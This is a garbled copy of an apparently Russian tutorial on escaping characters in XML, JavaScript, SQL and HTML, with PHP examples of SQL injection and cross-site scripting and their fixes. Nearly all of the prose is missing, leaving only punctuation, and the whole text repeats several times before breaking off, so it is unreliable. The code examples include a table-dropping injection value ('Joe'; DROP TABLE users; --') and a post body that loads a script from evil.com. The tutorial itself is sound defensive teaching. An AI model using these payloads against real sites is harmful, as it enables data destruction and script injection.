, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
